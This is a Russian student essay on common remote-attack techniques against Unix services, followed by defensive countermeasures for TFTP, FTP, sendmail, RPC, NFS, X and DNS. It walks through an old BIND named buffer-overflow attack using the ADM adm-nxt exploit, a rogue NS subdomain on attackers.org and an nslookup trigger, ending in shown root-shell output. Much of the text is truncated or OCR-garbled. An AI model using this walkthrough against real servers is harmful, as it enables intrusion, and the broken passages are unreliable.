Автор: Пользователь скрыл имя, 11 Ноября 2011 в 23:07, реферат
То, что информация имеет ценность, люди осознали очень давно – не даром переписка сильных мира сего издавна была объектом пристального внимания их недругов и друзей. Информация приобрела самостоятельную коммерческую ценность и стала широко распространенным, почти обычным товаром. Ее производят, хранят, транспортируют, продают и покупают, а значит – воруют и подделывают – и, следовательно, ее необходимо защищать. Современное общество все в большей степени становится информационно–обусловленным, успех любого вида деятельности все сильней зависит от обладания определенными сведениями и от отсутствия их у конкурентов.
Введение3
I. Часто используемые методы удаленного взлома 4
TFTP4
FTP5
Sendmail7
Службы удаленного вызова процедур RPC9
NFS12
Проблема защиты систем X19
Атаки на систему DNS21
II. Контрмеры от часто используемых методов удаленного взлома24
Заключение28
Список литературы29
7. Атаки на систему DNS
DNS является
одной из наиболее популярных
служб, используемых в Internet и
большинстве корпоративных
Несмотря на то, что с пакетом BIND связано
множество проблем обеспечения безопасности
(http://www.cert.org/
Для идентификации уязвимого сервера,
на котором запущена программа named. большинство
взломщиков прибегают к средствам автоматизации.
Для того чтобы определить, имеются ли
на вашем сервере DNS потенциально слабые
места, необходимо провести дополнительную
инвентаризацию.
[ tsunami]# dig
(§10.1.1.100 version.bind chaos txt
«» DIG 8.1 «» 010.1.1.100 version.bind chaos txt
(1 server found)
res options: init recurs defnam dnsrch
got answer:
-»HEADER«- opcode: QUERY, status: NOERROR, id: 10
flags: qr aa rd ra; QUERY: 1, ANSWER:
1, AUTHORITY: 0, ADDITIONAL:
QUERY SECTION:
version.bind, type = TXT, class = CHAOS
ANSWER SECTION: VERSION.BIND. OS CHAOS TXT"8.2.2"
В приведенном
фрагменте для определения
Для проведения такой атаки взломщик должен
контролировать сервер DNS, связанный с
удаленным доменом. На этом сервере DNS
взломщику необходимо также создать поддомен,
связанный с его собственным доменом.
В данном примере предполагается, что
сетью взломщика является attackers.org, поддомен
называется hash и сервер DNS запущен на узле
с именем quake. В данном случае взломщику
необходимо добавить в файл /var /named/attackers,
org. zone узла quake следующую запись, а затем
перезапустить программу named с помощью
интерфейса ndc.
subdomain IN NS hash.attaokers.org.
Следует помнить о том, что сервер DNS, контролируемый взломщиком, запущен на узле quake.
После
компиляции утилиты взлома, созданной
группой ADM (http: //packet storm.securify.com/9911-
[tsunami]# adm-nxt
Usage: adm-nxt architecture [command]
Available architectures:
1: Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)
2: Linux SolarDiz's non-exec
stack patch - named 8.2/8.2.1
3: Solaris 7 (Oxff) - named 8.2.1
4: Solaris 2.6 - named 8.2.1
5: FreeBSD 3.2-RELEASE - named 8.2
6: OpenBSD 2.5 - named 8.2
7: NetBSD 1.4.1 - named 8.2.1
После проведения предварительного сбора данных с использованием утилиты шпар стало известно, что на удаленном узле используется система Red Hat 6.x. Таким образом, для утилиты adm-nxt необходимо задать режим 1.[tsunami]# adm-nxt
После запуска утилита adm-nxt свяжется с UDP-портом 53 узла tsunami и будет ожидать установки соединения с уязвимым сервером имен. На этом узле не нужно запускать реальный сервер DNS, в противном случае утилита adm-nxt не сможет связаться с портом 53. Не следует забывать о том, что работа утилиты adm-nxt основывается на наличии целевого сервера имен, соединенного (или запрашивающего) с ложным сервером DNS, который на самом деле представляет собой утилиту взлома, прослушивающую UDP-порт 53. Как же взломщик может это реализовать? Очень просто. Для этого достаточно передать целевому серверу DNS запрос на получение некоторых данных с использованием команды nslookup.
[quake]# nslookup
Default Server:localhost.attackers.org
Address: 127.0.0.1
> server 10.1.1.100
Default Server: dns.victim.net
Address: 10.1.1.100 >
hash.attackers.org
Server: dns.victim.net
Address: 10.1.1.100
Как видно из приведенного листинга, взломщик запустил команду nslookup в интерактивном режиме на отдельном компьютере, находящемся в его полном распоряжении. Затем он перешел от использования сервера DNS, заданного по умолчанию, к серверу-жертве с адресом 10.1.1.100. И наконец, взломщик запросил у взламываемого сервера DNS адрес поддомена hash.attackers.org. Это, в свою очередь, приведет к тому, что сервер dns.victim.net сгенерирует запрос к ложному серверу DNS, который прослушивает USP-порт 53. Как только целевой сервер установит соединение с узлом tsunami, на узле dns.victim.net утилитой adm-nxt будет сгенерировано переполнение буфера, в результате чего взломщик получит неограниченный доступ с привилегиями root, как показано ниже.
[tsunami]# t666 I
Received request from 10.1.1.100:53 for hash.attackers.org type=l
id
uid=0(root) gid=0(root) groups=0(root)
II. Контрмеры от часто используемых методов удаленного взлома
Защита TFTP
Убедитесь в том, что сервер TFTP ограничивает доступ к определенным каталогам, таким как /tftpboot. Это воспрепятствует взломщикам получить важную информацию о конфигурации системы. Кроме того, рассмотрите возможность реализации механизма управления доступом на уровне всей сети в целом и на уровне отдельных узлов, который запрещал бы несанкционированный доступ к серверу TFTP.
Защита FTP
Хотя протокол FTP очень полезен, необходимо помнить, что разрешение анонимного доступа к FTP-серверу может весьма пагубно сказаться на "самочувствии" вашего сервера. Оцените необходимость использования FTP-сервера и определите, нужно ли предоставлять возможность анонимного доступа. В таких случаях для защиты сервера необходимо предпринять специальные меры. Очень важно установить самые последние версии модулей обновления, а также запретить или как минимум oipami-чить количество каталогов, в которые разрешена запись всем пользователям. А лучше вовсе откажитесь от таких каталогов.
Защита программы sendmail
Лучшим
методом защиты от попыток взлома
sendmail является отказ от ее использования
во всех случаях, когда эта программа
не используется для получения почты
по сети. Если использовать sendmail все
же необходимо, обязательно убедитесь
в том, что в вашем распоряжении
имеется ее самая свежая версия,
в которой установлены все
модули обновления системы защиты.
К другим мерам относится удаление
из соответствующего файла всех псевдонимов.
Исследуйте каждый псевдоним, который
указывает на программу, а не на учетную
запись пользователя. Кроме того, убедитесь,
что разрешения, заданные для соответствующих
файлов, запрещают внесение в них
каких-либо изменений. Существуют дополнительные
утилиты, призванные восполнить недостаточную
защищенность sendmail. Такими утилитами,
например, являются smap и smapd — программы,
входящие в комплект поставки пакета TIS,
который можно бесплатно получить по адресу http://www.tis.com/
Кроме вышеупомянутых изъянов, программа sendmail зачастую неправильно конфигурируется, что позволяет с ее помощью рассылать спам. В программе sendmail версии 8.9 и выше реализованы функции, предотвращающие ее использование для таких целей.
Защита служб RFC
Лучшим
методом защиты от удаленных атак
является отключение всех служб RPC, в
использовании которых нет
Защита системы NFS
Если нет острой необходимости в использовании системы NFS, то ее, а также и все связанные с ней службы (например, mountd, statd и lockd) необходимо отключить. Реализуйте механизм управления доступом, который позволил бы получать доступ к нужным файлам только санкционированным пользователям. Обычно экспортом файловых систем и включением соответствующих параметров управления доступом управляют конфигурационные файлы /etc/exports, /etc/dfs/dfstab и т.д. Некоторые параметры управления доступом позволяют задать имена компьютеров или групп, которым разрешен доступ, установить доступ только для чтения или запретить установку флага SUID. В каждой реализации системы NFS имеются небольшие различия, поэтому более подробную информацию об используемой версии поищите в документации или в справочной системе. Кроме того, никогда не включайте локальный IP-адрес сервера (или localhost) в список систем, которым разрешено монтировать файловую систему. Более старые версии службы portmapper позволяют взломщикам подключаться через proxy-серверы, работающие в интересах этих взломщиков. Если системе было разрешено монтировать экспортируемую файловую систему, взломщики могут отправить пакеты NFS службе portmapper взламываемой системы, что, в свою очередь, приведет к пересылке запроса на localhost. Такой запрос будет выглядеть так, словно он поступил с доверенного узла, что позволит ему обойти соответствующие правила управления доступом. Как всегда, в качестве последней по порядку (но не по значимости!) меры, советуем установить все модули обновления, предлагаемые разработчиками программного обеспечения.
Защита системы X
Сделайте
все возможное, чтобы избежать использования
команды xhost +. He ленитесь, помните о
безопасности! Если вы не можете пойти
на столь радикальные меры, тогда
хотя бы применяйте команду xhost -, которая
запрещает новые подключения, однако
позволяет функционировать уже
имеющимся. Если вы должны разрешить
удаленный доступ к вашему Х-серверу,
обязательно указывайте IP-адрес
каждого сервера, которому разрешен
доступ. Никогда не забывайте о
том, что любой пользователь такого
сервера может скрытно
Защита службы DNS
Первое
и самое главное — отключите
и удалите пакет BIND на всех узлах,
которые не используются в качестве
сервера DNS. Во многих версиях системы
UNIX (особенно Linux) программа named автоматически
запускается при начальной